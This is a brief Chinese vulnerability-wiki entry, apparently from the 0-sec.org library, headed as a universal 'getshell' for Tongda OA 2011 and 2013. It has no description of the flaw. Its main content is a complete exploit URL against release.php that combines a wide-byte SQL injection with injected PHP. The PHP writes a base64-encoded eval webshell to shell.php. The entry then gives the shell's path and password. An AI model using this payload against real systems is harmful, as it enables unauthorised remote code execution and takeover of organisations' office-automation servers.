通达oa 2011-2013 通杀GETSHELL

一、漏洞简介

二、漏洞影响

2011、2013版本

三、复现过程

第一步:

http://0-sec.org/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步:

http://0-sec.org/general/email/index.php

SHELL:

http://0-sec.org/general/email/shell.php 密码C
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-04 22:41:56

results matching ""

    No results matching ""